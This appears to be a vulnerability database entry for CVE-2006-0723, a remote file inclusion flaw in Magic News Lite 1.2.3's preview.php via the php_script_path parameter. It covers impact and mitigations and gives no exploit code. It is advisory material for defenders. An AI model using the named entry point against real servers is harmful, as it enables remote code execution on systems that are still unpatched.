CVE-2006-0723 in Magic News Lite
Summary
by MITRE
PHP remote file inclusion vulnerability in preview.php in Reamday Enterprises Magic News Lite 1.2.3, when register_globals is enabled, allows remote attackers to include arbitrary files via a URL in the php_script_path parameter.
If you want to get the best quality for vulnerability data then you always have to consider VulDB.
Analysis
by VulDB Data Team • 08/05/2017
The vulnerability identified as CVE-2006-0723 represents a critical remote file inclusion flaw in the Magic News Lite 1.2.3 content management system developed by Reamday Enterprises. This security weakness stems from improper input validation and unsafe file handling practices within the preview.php script, which processes user-supplied parameters without adequate sanitization. The vulnerability specifically manifests when the PHP configuration enables the register_globals directive, a deprecated feature that automatically creates global variables from request parameters, significantly expanding the attack surface for malicious actors.
The technical flaw resides in the insecure handling of the php_script_path parameter within the preview.php file, where user-controllable input directly influences the file inclusion mechanism. When register_globals is enabled, attacker-controlled variables become accessible as global PHP variables, allowing malicious users to manipulate the script execution flow by injecting malicious URLs into the php_script_path parameter. This creates a pathway for remote code execution through arbitrary file inclusion attacks, where attackers can load and execute malicious PHP scripts hosted on remote servers. The vulnerability operates under CWE-98, which classifies improper input validation leading to remote file inclusion, and aligns with ATT&CK technique T1190 for exploitation of remote services.
The operational impact of this vulnerability extends beyond simple data compromise, as it enables attackers to execute arbitrary code on the target server with the privileges of the web application. This remote code execution capability allows adversaries to establish persistent backdoors, exfiltrate sensitive data, modify website content, or use the compromised server as a launchpad for further attacks within the network infrastructure. The vulnerability is particularly dangerous in environments where the register_globals setting remains enabled, as this configuration significantly reduces the complexity of exploitation. Organizations running Magic News Lite 1.2.3 with this dangerous PHP configuration face substantial risk of full system compromise, data breaches, and potential regulatory violations.
Mitigation strategies for this vulnerability require immediate action to disable the register_globals directive in PHP configuration, which should be enforced at the server level rather than through application code modifications. Security administrators must also implement proper input validation and sanitization for all user-supplied parameters, utilizing parameterized queries and strict type checking to prevent malicious input from influencing file inclusion operations. The recommended approach includes upgrading to a supported version of the Magic News Lite software that addresses this vulnerability, implementing web application firewalls to detect and block malicious file inclusion attempts, and conducting thorough security assessments to identify similar vulnerabilities in other applications. Additionally, organizations should enforce the principle of least privilege for web applications and regularly audit their PHP configurations to ensure deprecated features like register_globals remain disabled.